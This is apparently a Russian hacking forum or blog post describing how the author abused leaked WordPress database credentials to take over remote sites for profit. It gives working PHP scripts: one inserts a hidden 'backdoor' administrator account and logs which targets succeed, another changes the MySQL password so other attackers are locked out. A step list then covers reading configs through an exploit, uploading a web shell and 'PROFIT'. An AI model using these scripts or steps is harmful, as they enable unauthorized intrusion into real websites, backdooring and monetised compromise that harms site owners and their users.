Польза конфигов

Немного о пользе конфигов.

Недавно, один форумчанин с форума выложил много-много конфигов вордпресса (логин, пароль, хост, имя базы данных из wp-config.php). Не долго думая, я отобрал все сайты, где в параметре host для подключения стоял не localhost или 127.0.0.1, а какой-нибудь левый айпишник или домен. Примерно в 2 случаях из трех, к базе можно было подключиться по удаленке:

По бырому набросал кодес для добавления админа в wordpress:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

<?php $domain = "example.com"; $host = "12.34.56.78"; $username = "wordpress_user"; $password = "12345678"; $dbname = "wordpress_db"; $prefix = "wp_";   if(mysql_connect($host, $username, $password)){     mysql_select_db($dbname);     //Добавляем нового пользователя     $sql="Insert into ". $prefix ."users (user_login, user_pass,user_nicename, user_email, user_status) values ('backdoor','\$P\$BYik6H.s4jTeR5NVUqmUVO0EQbpHJU/','backdoor','1337@backdoor.com','0')";     $result = mysql_query($sql);     $id = mysql_insert_id();       //Наделяем нашего пользователя админскими привилегиями     $sql = "Insert into ".$prefix."usermeta (user_id, meta_key, meta_value) values ('".$id."','wp_capabilities','a:1:{s:13:\"administrator\";b:1;}')";     mysql_query($sql);     $sql="Insert into ".$prefix."usermeta ('user_id', 'meta_key', 'meta_value') values ('".$id."', 'wp_user_level', '10')";     mysql_query($sql);                  //Записываем успешный результат     echo $domain." Good!\n";     $fh_good = fopen ("good.txt","a");     fwrite($fh_good, $domain.":".$dbname.":".$username.":".$password.":".$host."\n");     fclose($fh_good); } else {     echo "Bad!\n";     $fh_bad = fopen ("bad.txt","a");     fwrite($fh_bad, $domain.":".$dbname.":".$username.":".$password.":".$host."\n");     fclose($fh_bad); }

Проверил, все работает нормально.
Потом прогнал базу - вышло весьма неплохо (шекельно).

Самое веселое в том, что пока не сменят пароль юзера mysql, можно будет постоянно добавлять админов (или менять хеш админа на свой , заливаться и менять хеш обратно). Но, для того, чтобы школьнеги не баловались с базой, мы и сами можем сменить пароль юзера mysql:

1 2 3 4 5 6 7 8 9 10 11 12

<?php $domain = "example.com"; $host = "12.34.56.78"; $username = "wordpress_user"; $password = "12345678"; $dbname = "wordpress_db"; $prefix = "wp_"; if(mysql_connect($host, $username, $password)){ //Смена собственного пароля mysql_query ("SET PASSWORD = PASSWORD('NEW_PASSWORD')"); }

Разумеется, чтобы сайтик продолжал работать, после этого надо сменить пароль и в конфигах CMS.

Резюмируя все вышесказанное:

1. Прочитали конфиг через какой-то сплоент.
2. Нашли phpmyadmin / подключились к mysql напрямую
3. Добавили админа/сменили хеш старого админа
4. Залили шелл
5. Убрали багу через которую можно было прочесть конфиг
6. Сменили пасс юзера MySQL, чтобы больше никто не залился из тех, кто спарсил конфиг раньше вас.
7. PROFIT.